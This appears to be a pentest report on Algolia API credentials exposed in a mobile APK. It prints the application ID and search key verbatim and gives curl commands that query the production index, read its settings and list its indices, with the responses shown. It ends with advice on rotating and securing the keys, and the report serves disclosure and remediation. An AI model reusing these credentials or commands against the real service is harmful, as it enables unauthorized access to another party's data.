### Pentest Report: Exploitation of Exposed Algolia API Credentials
#### Title:
Exploitation of Exposed Algolia API Credentials in Mobile APK Source Code
#### Description:
Multiple Algolia API credentials, including the Algolia Application ID and Client Search API Key, were found exposed in the `res/values/strings.xml` file of a mobile APK. These credentials can be used to perform various actions on the Algolia search indices, including unauthorized searches, accessing private data, and potentially modifying index settings.
#### Steps to Reproduce:
1. Decompile the APK file using tools like `apktool`.
2. Navigate to the `res/values/strings.xml` file.
3. Locate the lines containing the Algolia credentials:
```xml
<string name="ALGOLIA_APP_ID">X5UKSETF9T</string>
<string name="ALGOLIA_CLIENT_SEARCH_API_KEY">d010c7f0e3964432dd752c249d81a6d2</string>
```
4. Use the credentials to make authenticated requests to the Algolia API.
#### Examples of Exploitation:
##### 1. **Perform a Search on an Index**:
- **Command**:
```sh
curl -X POST \
-H "X-Algolia-Application-Id: X5UKSETF9T" \
-H "X-Algolia-API-Key: d010c7f0e3964432dd752c249d81a6d2" \
-H "Content-Type: application/json" \
--data '{"query": "example query"}' \
https://X5UKSETF9T-dsn.algolia.net/1/indexes/production_document/query
```
- **Response**:
```json
{
"hits": [
{
"id": 83761630,
"title": "SQL",
"description": "Example Query",
"published_at": 1707479225,
"rating": 0,
"rating_positive": 0,
"rating_negative": 0,
"positive_experience_probability": 0.5,
"premium": false,
"thumbnail_sizes": {"115": "163", "300": "424", "1200": "1697"},
"language": "en",
"pages": 1,
"object_key": "56af8c5ba74c556306c36e8c4fe88be1",
"category_id": 3,
"category_translated_name": "Lecture notes",
"course": {
"id": 2318330,
"name": "Introduction to Relational Databases",
"code": "CS1106",
"institution": {
"id": 5210,
"name": "University College Cork",
"country_id": 87,
"language_id": 23,
"region_code": "en-ie"
}
},
"institution": {
"id": 5210,
"name": "University College Cork",
"country_id": 87,
"language_id": 23,
"region_code": "en-ie"
},
"academic_years": [2022, 2023],
"academic_year": "2022/2023"
},
...
],
"nbHits": 66,
"page": 0,
"nbPages": 4,
"hitsPerPage": 20,
"query": "example query",
"params": "query=example+query",
"processingTimeMS": 17
}
```
##### 2. **Check Index Settings**:
- **Command**:
```sh
curl -X GET \
-H "X-Algolia-Application-Id: X5UKSETF9T" \
-H "X-Algolia-API-Key: d010c7f0e3964432dd752c249d81a6d2" \
https://X5UKSETF9T-dsn.algolia.net/1/indexes/production_document/settings
```
- **Response**:
```json
{
"settings": {
"attributesToIndex": ["title", "description"],
"ranking": ["typo", "geo", "words", "filters", "proximity", "attribute", "exact", "custom"],
"customRanking": ["desc(rating)"],
...
}
}
```
##### 3. **List All Indices**:
- **Command**:
```sh
curl -X GET \
-H "X-Algolia-Application-Id: X5UKSETF9T" \
-H "X-Algolia-API-Key: d010c7f0e3964432dd752c249d81a6d2" \
https://X5UKSETF9T-dsn.algolia.net/1/indexes/
```
- **Response**:
```json
{
"items": [
{
"name": "production_book",
"createdAt": "2023-01-01T00:00:00Z",
...
},
{
"name": "production_chat_group",
"createdAt": "2023-01-01T00:00:00Z",
...
},
...
]
}
```
#### Business Impact:
The exposure of Algolia API credentials can lead to various business impacts, including:
- Unauthorized access to search data and insights.
- Potential manipulation of search results.
- Unauthorized access to private indices and data leakage.
- Service abuse leading to increased costs.
- Potentially damaging the reputation and trust of users if sensitive data is exposed.
#### Recommendations:
1. **Revoke and Regenerate API Keys**:
- Immediately revoke the exposed API keys from the Algolia dashboard.
- Generate new API keys and ensure they are not hardcoded in the source code.
2. **Secure Key Management**:
- Use environment variables or a secure vault service to manage and inject API keys at runtime.
- Implement a secure build process to avoid embedding sensitive information in the APK.
3. **Regular Security Audits**:
- Conduct regular security audits and code reviews to ensure no sensitive information is exposed.
- Use automated tools to scan the codebase for hardcoded secrets before deployment.
By following these recommendations, you can mitigate the risk associated with the exposure of API keys and enhance the overall security of your application.
Sign in with Wallet
Connect another wallet